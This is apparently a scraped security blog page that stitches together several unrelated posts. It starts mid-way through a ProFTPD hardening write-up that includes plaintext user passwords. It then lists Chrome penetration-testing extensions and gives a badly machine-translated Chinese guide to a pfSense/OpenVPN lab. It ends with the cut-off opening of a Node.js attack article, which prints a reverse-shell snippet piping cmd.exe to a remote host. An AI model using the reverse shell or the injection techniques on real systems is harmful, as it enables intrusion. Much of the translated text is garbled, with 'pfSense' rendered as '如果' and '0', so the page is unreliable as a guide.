The ProFTPD server was configured to support FTPS protocol by editing the /etc/proftpd.conf configuration file. Also, the plaintext FTP protocol was disabled and FTPS was enforced. Now ProFTPD will reject plaintext FTP connections. The following screenshot shows the added lines with comments and explanation:
Once the configuration was completed, The ProFTPD daemon was restarted, using the“service proftpd restart”command. Now, when the Windows 7 built-inFTP.EXEclient was used to connect to the server using the plaintext FTP protocol, the server rejected the connection with error message:“550 SSL/TLS required on the control channel.”
To test the login, the FileZilla FTP client was installed and it was able to successfully log in to the ProFTPD server using SSL/TLS. However, a warning message related to the certificate was shown. This is due to the fact that the certificate is self-signed. Once the certificate was accepted, on successive logins there were no errors.Also, passwords used for the FTP server should be secure and strong. The FTP users should have their shell changed to /bin/false, which will ensure that the FTP users will not be able to login over SSH, telnet, or TTY sessions. This was done using the following commands:# chsh -s /bin/false prithak# chsh -s /bin/false daniel# chsh -s /bin/false chintan# echo /bin/false >> /etc/shells

[3] Countermeasure Against Password Brute-Force AttackTo defend against password brute-force attack, the following steps were taken:

1. Strong passwords were chosen and the users’ passwords were upgraded. The following commands were used:
  # passwd prithak( when prompted for passwordalj234wkjw&82jlk2133was entered two times)# passwdchitan( when prompted for password234aj%2]32[maerewas entered two times)# passwddaniel( when prompted for password;8@#%2./ere$*.0*was entered two times)
2. Fail2ban utility was installed and configured on the ProFTPD system. The Fail2ban utility can detect and prevent password brute-force attack(s) by blocking the IP address(es) of the attacker. It checks the ProFTPD log (/var/log/secure) and, based on the configuration, automatically inserts iptables firewall rule(s) to block the offending IP address. The following steps were taken to install and configure the fail2ban with ProFTPD:
  - Fail2ban was installed using the following commands (Selvaganeshan, 2010):
    # wgethttp://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm# rpm -ivh epel-release-6-8.noarch.rpm# yum install -y fail2ban
  - The /etc/fail2ban/jail.conf file was edited and the following parameters were changed (Selvaganeshan, 2010):

bantime = 600 maxretry = 4The bantime defines the number of seconds to block the attackers IP and the maxretry parameter is the number of failures allowed before the IP is blocked. So, in this case, if any IP has more than four failed logins, it is banned. Similarly, monitoring ProFTPD logs was also enabled in the “proftpd-iptables” section:

Then the fail2ban service was restarted using the following command:
# /etc/init.d/fail2ban restartAt the beginning, no IP address was blocked by fail2ban with the help from iptables. The default rule set in fail2ban-ProFTPD chain was empty as shown below:
When FTP password brute force attack is carried out from IP address 192.168.79.222 (backtrack) on the ProFTPD server (192.168.79.135), the attack is detected and the IP address of the attacker is blocked:
The iptables rule to block the IP 192.168.79.222 that was inserted by fail2ban is highlighted below:
CONCLUSION
ProFTPD server was installed from source and attacked using buffer overflow exploit, password sniffing, and password brute-force attacks. Also, the service was secured using compulsory SSL/TLS certificates and the Fail2ban intrusion detection system and by upgrading the service to the latest version.

2017年5月17日

Extensions to Turn Google Chrome into Penetration Testing tool hackerschina

Google Chrome is the most popular web browser of the world. It’s light weight and comes with a clean interface. This is the main reason of its popularity. It also has various other features that make website browsing easy and faster. Like Firefox, Chrome also supports add-ons but called extensions for Chrome. Extensions help us in improving the functionality of Google Chrome.

LEARN FROM THE BEST PENETRATION TESTING CLASS

There are thousands of Google Chrome extensions available that add nice tools directly in the browser and reduce the need of installing separate tools for those works. In previous posts, we have covered the Firefox add-ons that make Firefox a security testing tool. Like Firefox, we can also make Google Chrome a security tool with the use of some nice security extensions.

In this post, I have collected all those extensions that help us in the penetration testing process. All these extensions are available for free to download from Google Chrome’s Web store. Few extensions are not available unofficially. So, you need to download from their official website.

Note: Description of tools taken from Official Release Note:

Google Chrome Extensions for Security researchers and penetration testers

Web Developer,
is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
AddWeb DeveloperExtension in Chrome here:https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm
Firebug Lite for Google Chrome, provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.AddFirebug Liteto Google Chrome:https://chrome.google.com/webstore/detail/firebug-lite-for-google-c/bmagokdooijbeehmkpknfglimnifench
d3coder,is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time to encode and decode strings by using separate tools. This extension can perform a wide range of functions. See the list below:
- Timestamp decoding
- rot13 en-/decoding
- base64 encoding
- base64 decoding
- CRC32 hashing
- MD5 hashing
- SHA1 hashing
- bin2hex
- bin2txt
- HTML entity encoding
- HTML entity decoding
- HTML special chars encoding
- HTML special chars decoding
- URI encoding
- URI decoding
- Quoted printable decoding
- Quoted printable encoding
- Escapeshellarg
- Base64 decode
- Base64 encode
- Unserialize
- L33T-en/decode
- Reverse
Add d3coder extension to Google Chrome:https://chrome.google.com/webstore/detail/d3coder/gncnbkghencmkfgeepfaonmegemakcol?hl=en-US
Site Spider, is an extension that adds a crawler in Chrome. It crawls all pages and reports all broken links. One can also restrict the spider by adding restrictions and regular expressions, it works at the client’s side. It can also use your authentication to access all pages. This extension is opensource. So, you can easily modify it according to your needs.
AddSite Spiderto Google Chrome:https://chrome.google.com/webstore/detail/site-spider/ddlodfbcplakmddhdlffebcggbbighda
Form Fuzzer, is used to populate predefined characters into different form fields. It can also select checkboxes, radio buttons and select items in forms. It has a configuration menu where you can manage all settings of the extension. It is really helpful in testing forms. You can set payloads for forms and then populate payloads quickly with this nice tool. Really helpful in performing XSS and SQL injection attacks.
AddForm Fuzzerto Google Chrome:https://chrome.google.com/webstore/detail/form-fuzzer/cbpplldpcdcfejdaldmnfhlodoadjhii
Session Manager, is a powerful Chrome extension that lets users save, update, restore, and remove sets of tabs. You can create a group of tabs of the same interest and then restore those pages in one click. If you open few specific pages daily, and create groups of those pages and then open with a single click.
AddSession Managerto Google Chrome:https://chrome.google.com/webstore/detail/session-manager/mghenlmbmjcpehccoangkdpagbcbkdpc
Request Maker, is a core penetration testing tool. It’s used in creating and capturing requests, tampering the URL, and making new headers with post data. It can capture requests made via forms or XMLHttpRequests. You can see the function of this tool is similar to Burp. It’s also helpful in performing various kind of attacks in a web applications by modifying http requests.
AddRequest Makerto Google Chrome:https://chrome.google.com/webstore/detail/request-maker/kajfghlhfkcocafkcjlajldicbikpgnp
Proxy SwitchySharp, is a proxy extension that helps in managing and switching between multiple proxies quickly. It also has an option to set auto proxy switching based on URL. You can also import or export data easily. With proxy switcher, we can hide IP addresses and perform penetration testing tasks to check how a person can attack with proxy servers.
AddProxy SwitchySharpto Google Chrome:https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm/details
Cookie Editor, is a nice Chrome extension that lets users edit cookies. This tool is really helpful while hijacking vulnerable test sessions. It lets users delete, edit, add/or search cookies. It also lets users protect, block or export cookies in json. You can play with cookies as you want. This extension is ad-supported and all revenue goes to Unicef to help children worldwide. But Ads are not necessary and you can disable anytime from the extension settings page.
Add Edit This Cookie to Google Chrome:https://chrome.google.com/webstore/detail/edit-this-cookie/fngmhnnpilhplaeedifhccceomclgfbg
Cache Killer, is another nice extension that automatically cleans the browser cache before loading pages. It can be easily enabled or disabled with a single mouse click. It’s useful to bypass the browser cache and see the exact website in case it’s changing. This is much useful for web developers.
AddCache KillerExtension to Google Chrome:https://chrome.google.com/webstore/detail/cache-killer/jpfbieopdmepaolggioebjmedmclkbap
XSS Rays, is a nice extension that helps in finding XSS vulnerability in a website. It finds how a website is filtering the code. It also checks for injections and inspects objects. You can also easily extract, view and edit forms non-destructively even if forms cannot be edited. So many penetration testers use this extension as a dedicated XSS testing tool. It’s pure JavaScript XSS scanner. You canread more about XSS Rays here.
AddXSS raysto Google Chrome:https://chrome.google.com/webstore/detail/xss-rays/kkopfbcgaebdaklghbnfmjeeonmabidj
WebSecurify, is a powerful cross platform web security testing tool. It’s available for various desktop, mobile platforms and browsers. This is the first web security tool that runs directly from the browser. It’s capable of finding XSS, XSRF, CSRF, SQL Injection, File upload, URL redirection and various other security vulnerabilities. It has a built in crawler that scans and crawls pages. Then it will try to find vulnerability on pages. It’s not a fully automatic tool. It lists possible vulnerability on the URL. You will need to confirm the vulnerability manually. We have already covered the websecurify tool in detail. You can check older posts to read more on how this tool works and how to master websecurify for penetration testing. While scanning, it pulls all features from the WebSecurify server, so you do not need to worry about database updates. The vulnerability engine will be updated at all times. Penetration testing tools are just a click away. Use this either as a browser tool or desktop tool.
AddWebsecurifyto Google Chrome:https://chrome.google.com/webstore/detail/websecurify/gbecpbaknodhccppnfndfmjifmonefdm
Port Scanner, Google Chrome extension adds port scanning capabilities to the browser. With this extension, you will be able to scan which TCP ports are listening. Port Scanner analyzes any given IP or URL addresses, and then will scan for open ports to help you to secure them. It is also available for Opera and Mozilla Firefox.
AddPort Scannerto Google Chrome:https://chrome.google.com/webstore/detail/port-scanner/jicgaglejpnmiodpgjidiofpjmfmlgjo
XSS chef, is the popular Chrome extension that works directly in the browser. It helps us in identifying XSS vulnerability in a web application. It’s similar to BeEF but for browsers. It performs following tasks:
- Monitor open tabs of victims
- Execute JS on every tab (global XSS)
- Extract HTML, read/write cookies (also httpOnly), local Storage
- Get and manipulate browser history
- Stay persistent until whole browser is closed (or even further if you can persist in extensions’ local Storage)
- Make screenshot of victims window
- Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
- Explore filesystem through file:// protocol
- Bypass Chrome extensions content script sandbox to interact directly with page JS
This is not an extension but a framework. So, installation is not same as any other extension. Read the official link of XSS Chef given below and learn how to install it in Chrome.
AddXSS chefto Google Chrome:https://github.com/koto/xsschef
HPP Finder, is another nice extension. It is useful in finding HTTP Parameter Pollution (HPP) vulnerability and exploit it. This tool can easily detect and exploit the HTML Forms or URLs that might be susceptible of HTTP Parameter Pollution attacks. This tool can only find the vulnerability points but is not a solution against the vulnerability.AddHPP Finderin Google Chrome:https://chrome.google.com/webstore/detail/hpp-finder/nogojgcobcolombicplhimbbakkcmhio
The Exploit Database, is not a penetration testing tool, but it keeps you updated with all latest exploits, shell code and white papers available on Exploit DB server. It’s an open source tool and source code can be found here:http://github.com/10n1z3d/EDBEAddThe Exploit Databaseextension in chrome:https://chrome.google.com/webstore/detail/the-exploit-database/lkgjhdamnlnhppkolhfiocgnpciaiane
GHDB, is a nice Google hack query search. This nice extension help you in searching for necessary Google hack querys for finding specific pages based on special Google search parameters. It allows you in understanding the basis of web security in a better way.
AddGHDBin Google Chrome:https://chrome.google.com/webstore/detail/ghdb/jopoimgcafajndmonondpmlknbahbgdb
iMacros for Chrome, while performing various web page testing processes, you may need to automate few repetitive tasks on the web. For this, you can use iMacros for Chrome extensions. So, next time when you need this kind of thing, Use the macro and then start it with a click button.InstalliMacros for Chromein Chrome:https://chrome.google.com/webstore/detail/imacros-for-chrome/cplklnmnlbnpmjogncfgfijoopmnlemp
IP Address and Domain Information, is an information gathering extension that can help you in finding geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of every IP address (IPv4 and IPv6).Add it to Chrome:https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/lhgkegeccnckoiliokondpaaalbhafoa

How to Install Chrome Extension in the browser

Installation of extension is one click process if it is available in the official Chrome store. But it may be confusing if you have extension code only.

Install from Official Chrome store:To install the extension from official chrome store, just click on the link given below each extension and open the chrome store page of the extension. You will see a blue button saying, “Add to Chrome.”

Figure: Chrome Extension Installation Button

After clicking this button, installation will begin and you will not need to do anything else. It will download a file and then add it to your Chrome. By default, it will activate the extension.

Install Extension manually with source file:Few extensions are not available on official chrome store because they do not meet the terms and conditions of store. So, these are available unofficially on their website. If you want to install those extensions, then download it from the official website. Now open the Chrome extension page and drag the source file and drop it on the extension page. Extension will install automatically after dropping on extensions page.

ETHICAL HACKING TRAINING

If you want to deactivate an extension from Chrome, go to settings and then Extensions page. Here you will see the installed extensions. In front of each extension, you will see a check box. To disable the extension, you only need to de-select the select box. To remove the extension permanently, click on the trash icon near the check box.

Figure: Chrome Extension enable/disable

Conclusion

After reading this post, you will come to know that Chrome is more than just a browser. With these nice extensions, it will become the friend of penetration testers and security researchers. Install these extensions in your browsers and start your penetration testing process. These tools include a wide range from gathering information to performing attacks. Few tools can be used to gather information and inspect the header information of a request. XSS Rays, XSS Chef, HPP Finder and WebSecurify are the most helpful tools that are used widely as security tools.

At last I have also added exploit tools to search for vulnerability, shells and white papers. You can use the exploit search extension to search for an exploit and use it while performing attacks.

Use these tools and share your experience with us. Share which extension you like most via comments.

2017年5月17日

中国骇客云平台教您建立一个基于vpn的渗透测试环境！更多关注我们哦！

说明

在今天的信息安全培训，时间和地点的一个与会者的关键因素。许多人倾向于选择一个灵活的培训计划，可以参加从他们的家吧。一些组织已经采取了一些进步，通过提供在线培训和实验室都可以从世界任何地方使用虚拟专用网络（VPN）。如果你曾经想知道他们如何才能建立这样的实验室，如果你连接到互联网，从世界上任何地方的灵活和方便，你是在正确的地方。这个简短的电子书是一个试图建立一个基于VPN的渗透测试实验室使用VirtualBox和pfSense的说明一步一步的过程。在本书的结尾，你会有以下的基于VPN建立的实验室实施渗透测试。

VirtualBox是选择在一个系统中整个过程模拟。当你在现实世界中，你也可以选择其它选项，如VMware ESXi。

VirtualBox是什么？

“Oracle VM VirtualBox（原Sun VirtualBox，Sun xVM VirtualBox和伊诺特VirtualBox）是一个自由和开放源码的甲骨文公司的x86计算机管理程序。由innotek公司最初开发的，它是在2008又2010被Oracle收购Sun收购。

VirtualBox可以安装在主机的操作系统，包括Linux、OS X、Windows、Solaris和OpenSolaris。

它支持guest虚拟机运行Windows版本和推导，建立和管理Linux，BSD，OS / 2，Solaris，俳句，张，和其他人，和OS X的客人苹果硬件有限的虚拟化”。

来源：https://en.wikipedia.org/wiki/virtualbox

VirtualBox可以从下面的链接下载。

http：／／／wiki／下载www.virtualbox.org

下载为您的主机VirtualBox软件的相应版本并安装它。这是需要我们继续后面的章节做。

如果是什么？

“如果是一个开源的防火墙/路由器基于FreeBSD的计算机软件分布。它是安装在一个物理计算机或虚拟机为网络专用防火墙/路由器，以其可靠性和提供的功能，通常只出现在昂贵的商业防火墙。它可以被配置和升级，通过一个基于Web的界面，不需要了解底层的FreeBSD系统管理。如果通常部署为边界防火墙、路由器、无线接入点、DHCP服务器、DNS服务器，作为一个VPN端点。如果支持第三方包像Snort或鱿鱼通过它的软件包管理器安装。”

来源：https://en.wikipedia.org/wiki/pfsense

如果防火墙可以从下面的链接下载。

https://www.pfsense.org/download/

笔测试培训–资源（信息安全）

如果在VirtualBox安装：官网www.hackerschina.org

推出虚拟框并单击“新建”创建一个新的虚拟实例。

如果是基于BSD。因此，创建新的虚拟机时，选择“和”和“FreeBSD版本（64位）”。如下图所示。

allocate pfsense 512 MB的RAM。

您可以指定6 GB的硬盘空间，如果。然后选择“硬盘文件类型”为“VDI。”检查“动态分配”存储在物理硬盘。上述所有的设置如下图所示，在下面的截图。

最后，单击“创建”

现在，我们应该有一个新的虚拟机实例。选择虚拟机实例，点击“开始”。

这将要求的源图像。选择你下载的Live CD的开始。

一旦选择后的Live CD，单击“开始”，如下图所示。

我们现在应该看到下面的屏幕。

在上面的屏幕上弹出，回车。它会自动把你带到下一个屏幕，如下图所示。

现在，我们得到了各种选择。

如果你想安装的pfSense的实例而不是启动它的live CD，我们可以简单地键入“我”并回车，在超时之前。

所以，它将调用pfSense安装程序如下图所示。

选择“接受这些设置”并回车。

然后选择“快速、容易安装”并回车。

看完上面的警告，如果你有好的安装，选择“确定”并回车。

安装需要一定的时间过程，如上图所示。

当你看到上面的画面，就选择“标准内核”并回车。

一旦你完成了安装，你应该看到上面的屏幕。选择“重新启动”并回车。

祝贺你!如果你刚刚完成安装。

一旦你完成了安装、删除图像文件，VDI文件将从明年启动的应用。

下面是做的步骤

导航到pfSense的VM，然后点击存储。你可以看到下面的屏幕。

现在，选择图像文件并给右键如下图所示。

一旦去除附着物后，你会看到下面的窗口。

如果你开机如果现在VDI文件将被加载，和所做的任何更改此磁盘将坚持。

因为如果配置网络接口：

本节包括网络配置为0虚拟机。这个配置是模拟公共用户和内部机器重要。

选择0 VM和浏览settings->Network->Adapter 1然后选择桥接模式如下图所示

这将确保任何设备连接到Wi-Fi网络将作为一个公共用户。当你在现实世界中，这个接口必须与一个公共IP地址代替。

现在，浏览settings->Network->Adapter 2然后选择内部网络如下图所示

这将确保任何机器连接到内部网络的网络适配器将直接连接到LAN侧的pfSense的实例。在网络上的机器都被视为是要向公众可通过VPN隧道内的机器。

这样，我们启动虚拟机之前，如果完成所有需要的设置。

分配IP地址，如果：

在前面的步骤完成安装和网络设置后，是时候启动你的如果在第一时间和IP地址分配给网络接口我们前面配置。

启动你的pfSense的实例，你可以看到下面的屏幕。

按下F1键，你可以看到下面的屏幕显示IP地址的接口。

你可以看到在上面的图中，两个接口的IP地址被自动分配。在广域网接口的IP地址是路由器的DHCP服务器分配。让我们改变对一系列不同的LAN接口的IP地址。

当你在上面的屏幕，只要输入2选择”指定的接口。”然后，我们应该看到可用的界面如下图所示。

因为我们要配置第二界面，我们选择“2”再。这应该让我们配置的专用接口，这是EM1（局域网）。

然后我们会被提示输入局域网IP地址。在我们的例子中，我们也为提供新的IP地址。

现在，让我们回车。我们会被提示输入子网掩码位计数。

输入键24

所有这些步骤的解释至今都在下面的截图。

点击进入3次让屏幕配置DHCP服务为局域网。

当你看到上面的屏幕，输入“Y”回车。然后，我们需要输入IP地址范围。根据内部系统的数量在你的网络你可以给一个特定的IP地址范围。在我们的例子中，我们给从10.1.1.10到10.1.1.20

这是在如下图所示

一旦完成，回车型和“Y”又从一个GUI有0配置webconfigurator然后回车。

我们应该看到屏幕上面有网址的地方，我们可以访问如果配置的图形用户界面。

最后，按回车键回到命令行配置界面，它出现在从0。

如果我们现在观察，我们应该看到的一切设置的界面。

如果从webconfigurator访问：

直到现在，我们已经配置好的pfSense的命令行界面的一切。如果提供了一个很好的界面，在这里您可以轻松地配置一切。从这里开始，我们将用GUI做余下的配置。让我们开始一个新的虚拟机连接到内部网络适配器，如下图所示。

现在，启动这个虚拟机和访问pfSense使用Web浏览器的Web配置界面。这可以通过打开浏览器，浏览到的pfSense的实例的内部适配器，如下图所示。

以下是pfSense的管理控制台的默认凭据。

用户名：admin

密码：如果

当你进入这些凭据在上面的屏幕，如果将贯穿初始配置如下图所示。

单击“下一步”当你看到上面的屏幕。你会得到下面的信息，你可以点击“下一步”，如果你不是在寻找先进pfSense的特点。

在下一个屏幕上，你会被提示输入DNS服务器地址。进入主DNS服务器和DNS服务器地址，如下图所示。这些都是谷歌的DNS服务器地址。

在下一屏幕上，如果你想的话你可以更改时区。我们可以把它们
为默认设置如果你没有一个明确的选择。

点击“下一步”直到你看到下面的屏幕。你应该看到pfSense的局域网内的IP地址和子网掩码我们前面配置。

单击“下一步，“你应该看到下面的屏幕。这是改变的管理员密码，这里明显的重要原因。确保它是强大到足以防止暴力破解。

单击“下一步，然后你会看到下面的窗口。

这给我们带来了最初的0配置结束。点击“刷新”按钮，你将看到下面的屏幕。

导航到pfSense的主页，你应该看到仪表如下面的截图所示。

祝贺你!你已经完成了初始pfSense的配置虚拟框。如果防火墙现在已经准备好了，我们可以将其配置为不同的目的。

创建一个证书颁发机构：

让我们看看创建pfSense的证书颁发机构的步骤。这是以后需要为签约用户和服务器的证书。创建一个证书颁发机构，推出证书颁发机构经理通过导航到|证书管理系统这要看如下

在上面的屏幕，点击按钮下的CAs tab创造了一种新的证书颁发机构。这将创建一个新的证书颁发机构。如下图所示填写细节。

描述性的名称可以是任何用户想要的（在我们的例子中，它是vpnlab_ca）和方法应创建一个内部证书颁发机构

密钥长度为2048比特，和文摘算法SHA256。这是CA的有效期为3650天。最后，我们填写个人信息。

填充后的一切，点击保存，这就是全部。CA将创建如下图所示。

证书颁发机构造就了我们现在可以用来标志内部证书，我们在接下来的几节创建。

创建服务器证书

创建服务器证书，我们可以再次发射证书颁发机构经理通过导航到|证书管理系统然后点击证书标签这要看如下

类似于创建证书的权威，让点击按钮，如下图所示填写证书的详细信息。

你可能会注意到，我们正在创造一种类型的内部证书服务器证书这一次，它servercert命名。你也应该注意到，我们使用的是以前创建的vpnlab_ca作为我们这个服务器证书的证书颁发机构。

下一步，填写个人信息，如下图所示，点击保存。

上面的步骤将创建一个服务器的证书签名的vpnlab_ca。这看起来如下。

你可能会注意到在上面的图中第二项。恭喜!我们刚刚创建的服务器证书的证书颁发机构签署的。

创建VPN用户

我们已经完成了创建证书和服务器证书。现在我们需要创建能够使用我们的VPN服务的用户。让我们浏览|用户管理系统开始创建一个新的VPN用户。这看起来如下图所示。

如前面的图所示，单击按钮下用户标签。这将打开下面的表格，我们需要填写新用户的详细信息。

我们可以看到在上面的图中，我们正在创造一个新的用户vpnuserone一个密码。这些证书是很重要的，用户需要连接到我们的VPN服务器时。

在这里，我们有一个复选框来创建用户证书，这将创建在本节稍后。你可以把所有剩下的田地空如下图所示，点击保存

这将创建一个新的用户帐户vpnuserone如下图所示

同样，我们可以如果你有多个用户连接到您的VPN服务器上创建多个用户帐户。

创建一个VPN用户证书

我们要创造这部分的用户证书。我们要基于证书的双向认证，这意味着客户必须验证服务器证书和服务器必须验证客户端证书之前，相互信任是建立。

服务器和客户端将验证另一验证提出的证书是由主的证书颁发机构（CA），然后签署通过测试信息在现在认证证书的标题，如证书通用名称或证书类型（客户端或服务器）。

来源
http：／／／index.php／openvpn.net开源/文件/ howto.html

所以，让我们通过创建一个用户证书|证书管理系统。这看起来如下图所示。

下证书选项卡，点击按钮，你将看到下面的屏幕。

填写正确的细节显示在上面的数字。你可能会注意到证书颁发机构的领域，在那里我们使用我们先前创建的证书颁发机构命名vpnlab_ca。这将是CA证书的用户也。此外，您可能会注意到的证型，这是用户证书

下一步，填写以下信息并点击保存按钮

这将创建用户证书如下图所示。

上述数字表明，我们有一个服务器证书和用户证书的证书颁发机构vpnlab_ca

如果你还记得，我们选择离开单击“创建用户证书复选框未选中而创建的用户vpnuserone。所以，我们要添加该用户证书这个用户现在。

我们可以通过导航到相应的用户添加证书用户
经理部分再次。这看起来如下图所示。

选择用户vpnuserone点击E在右边的按钮。你将会看到如下。

现在，单击按钮，确保你下证书Tab。选择方法选择一个现有的证书与选择vpnuserone证书下现有的证书下拉。点击保存和用户证书将被添加

这将分配证书vpnuserone给用户vpnuserone。你可以看到新添加的证明书用户证书选项卡，如下图所示

同样的过程必须遵循每当创建一个新用户。

配置OpenVPN：

直到现在，我们已经需要开始与实际的VPN服务器工作的先决条件。现在，我们将配置VPN服务器，允许用户连接到我们的私人实验室。要做到这一点，我们要利用OpenVPN的能力，其中预装0。

点击| OpenVPN的VPN。这看起来如下

开放奇才标签在上面的屏幕，你将看到下面的。

选择本地用户访问作为服务器的类型点击下一个

接下来，你会看到下面的窗口。确保你选择的CA我们先前创建的证书颁发机构下拉列表单击下下一个

下一步，选择servercert，这是我们先前创建的服务器证书，单击下一个

现在，我们在OpenVPN配置最有趣的部分。仔细按照步骤，选择你的选择。

我们选择了广域网作为接口，我们将得到我们的VPN连接到广域网接口。

OpenVPN使用UDP端口默认为1194。所以，我们选择UDP作为协议一千一百九十四作为本地端口

往下看选项进一步

选择密码
设置如上面的图所示

下一步，我们将建立隧道
设置

隧道网络是我们要在内部网络的物理服务器进行通信的虚拟网络。这意味着当用户连接到VPN服务器，在规定的范围内的虚拟IP隧道网络现场将分配给用户。让我们将这作为10.1.2.0/24，所以用户将获得投资X作为自己的IP地址。

我们有实际的网络之前设置与目标机的IP地址的范围10.1.1.0/24

下一步，填写并发连接10。你可以改变它，根据你的需要。

向下滚动，进一步会告诉我们的客户
设置如下图所示

让我们在上面的图中所示填写谷歌的DNS服务器的IP地址的DNS服务器和DNS服务器两部分中。

8.8.8.8成为DNS服务器1

8.8.4.4成为DNS服务器2

最后，单击下一个当你看到下面的屏幕

我们将在下面的屏幕上。在这里，我们将添加防火墙和VPN规则开放。检查防火墙规则和OpenVPN的规则和相关的复选框，单击下一个

现在转到防火墙|规则检查防火墙规则，我们刚刚在上一步添加的是成功还是不成功。

我们可以看到上面的图，有防火墙规则添加WAN地址和UDP端口1194。这意味着，任何连接到端口1194上湾地址将接受不论源IP和端口。

最后，单击“完成”按钮，完成OpenVPN设置.

如果你浏览| OpenVPN的VPN再次，你将看到下面的条目显示VPN服务器配置。

安装额外的软件包

需要注意的是，如果默认情况下不具有一些重要的软件包安装。然而，根据您的需要，您可以安装包。例如：如果你需要Snort入侵检测系统，你需要从pfSense的包管理器安装。

现在，在我们的例子中，我们需要安装一个叫做实用OpenVPN客户端导出工具。这是需要出口的VPN用户客户端证书。我们需要提供这些证书，这些证书的用户，用户需要能够连接到VPN服务器。

让我们通过做它系统|包裹。这将给我们的软件包管理器as shown in the following的人物。

下安装
包裹默认情况下，我们将没有因为我们没有安装
任何包直到现在

点击可用
包裹下列工具标签和搜索

点击按钮，打开旅行包
安装程序标签

点击确认在上面的窗口，它将安装如下图所示。

一旦完成，你应该看到软件包的安装如下图所示。

现在，这包应该是可见的下安装
包裹选项卡，如下图所示

好的！我们已经完成了所有的配置和准备连接到VPN服务器作为用户。然而，用户没有所需的文件连接到服务器。所以，让我们用客户出口效用出口证书存档文件，并提供给用户。

引导到VPN | OpenVPN，你将看到下面的

点击客户
出口标签

找到您要导出的证书（在我们的情况下，vpnuserone）并单击资料库链接导出的证书文件

保存文件到你的机器并把它传递给用户。

连接到服务器的用户

现在，用户可以连接到VPN服务器的文件。Kali Linux是在VirtualBox安装，而且通过桥连接网络。这意味着卡利只能通过pfSense的WAN接口达到0。

运行解压命令解压文件到当前目录。

我有改名的文件vpn.zip缩短文件名。

现在，导航到文件夹中，你将看到下面的文件。

输入检查你的IP地址命令命令

目前，卡莉Linux有两个接口。第一个是桥接网络接口和第二个是环回地址。

如果我们试图ping后面pfSense的机器，我们不能到达。以下图证实了它。

现在，让我们尝试连接到VPN服务器使用以下命令。

OpenVPN和[文件名]。

凭据我们设置相同的同时创造vpnuserone。所以，输入用户名和密码时，提示。

你可以看到在前面的图中，客户端无法连接到服务器。

这是由于防火墙阻断交通从IP地址保留给私有网络。由于我们使用的是模拟网络，我们有一个分配给卡利Linux私有地址。为了克服这个问题，浏览界面->万在pfSense的Web配置和取消块私人网络

点击保存，你将看到下面的确认提示。

点击应用更改，你应该很好的去

此外，你可以看到下面的错误连接到VPN服务器时。

当你看到上面的错误，打开和文件，你有提取zip文件后，注释行的开始，-验证X509 NAME。这是在如下图所示

相信我；我们有固定的所有问题。现在，让我们尝试连接到VPN服务器再次使用前面我们已经看到同样的过程。

如果你看到消息初始化
序列
完成如上面的图所示，你成功连接。交叉验证，开辟了一个新的终端类型命令命令

这一次，我们有一个新的接口tun0随着虚拟IP地址10.1.2.6如上面的图所示。如果你还记得，这是我们分配到隧道网络在配置OpenVPN的系列IP地址。

现在，我们实际上是连接到专用网络的目标。砰的一个内部的机器将确认这。

我们现在可以开始测试目标IP地址。

让我们用nmap扫描的IP地址10.1.1.10并观察结果。

我们可以看到在前面的图中，我们可以扫描内部机器使用VPN连接。

我们也可以确认是谁在连接到VPN服务器状态-> OpenVPN。这看起来如下图所示。

你可以看到在前面的图中，一个虚拟IP地址10.1.2.6机是目前连接到VPN服务器。我们也可以看到客户的真实地址。

同样，我们可以添加任意数量的目标机器的渗透测试实验室，添加一个新的机器，提高你的VPN，只需安装在虚拟盒子，把它添加到你的内部
网络适配器这是在如下图所示。

现在，启动机器，检查IP地址。

我们可以看到在上面的图中，我们有10.1.1.12作为我们的IP地址到新机。

再次，我们可以使用Nmap扫描本机。这看起来如下图所示。

当内部渗透测试远程完成，我们使用相同的概念，客户应向我们提供VPN的细节能够连接和测试内部网络。

结论：

这个小小的电子书已经尝试向你展示如何基于VPN的渗透测试实验室可以设置可以设置您的网络在一个地方和实践渗透测试在世界任何地方。这是这些天很多培训项目的趋势，它消除了麻烦建立实验室每次有训练。我们可以简单地设置一个实验室永远使用它。

2017年5月17日

中国骇客云教你渗透测试Node.js应用介绍，如何使用node.js进行渗透测试！

在这篇文章中，我们将看看时如何进行渗透测试Node.js应用或寻找Node.js的具体问题。

说明

js是一个服务器端语言建立在谷歌浏览器的V8引擎的顶部。它采用事件驱动的非阻塞I/O是数据密集型应用的完美候选人。它运行在一个单线程的服务器，这也意味着任何有意/无意的拒绝服务的尝试将杀死服务器把所有客户脱机，负载均衡器以便更好地使用多个实例。在这篇文章中，我们将看一些漏洞更具体到Node.js如何识别和利用他们在真实世界的情景。

信息收集

像任何其他信息收集网络应用的阶段，我们将寻找到任何奇怪的cookie名称[”connect.sid”]，服务器标题和x-powered-by头。可以在下面的截图中看到，x-powered-by标题显示应用程序正在运行下快递框架。此外，我们现在可以深入挖掘框架/包具体漏洞太。

脆弱性分析和利用

截至目前，我们已经确定Node.js应用一个轻微的想法，让我们在其他的漏洞一看。我们将在下面的弱点：

服务器端代码注入
系统命令注入
正则表达式的DOS
HTTP参数污染
无保护的途径
全局命名空间污染
跨站点脚本
不安全的组件
安全代码审查

服务器端代码注入：

在js代码注入也围绕着“最著名的功能eval“所以，不要使用eval在你的代码的功能，这也意味着没有插入用户直接输入任何的系统功能，如setTimeout，setInterval，等.

在我们的演示代码，我们使用eval解析参数的类型，在这种情况下是一个整数，后面添加。同样可以克服使用parseInt功能

可以看出，我们能够执行我们的有效载荷和关闭应用程序。

反向外壳

进一步，我们可以使用下面的代码片段到Node.js应用反向壳。

功能启（主机、端口）{
var net = require(“net”);
var cp = require(“child_process”);

var cmd = cp.spawn(“cmd.exe”, []);

var client = new net.Socket();

client.connect（主机，端口，function（）{

客户。写（“连接\r\n”）；

client.pipe（cmd.stdin）；

cmd.stdout.pipe（客户端）；

cmd.stderr.pipe（客户端）；

客户。在（'exit”功能（编码、信号）{

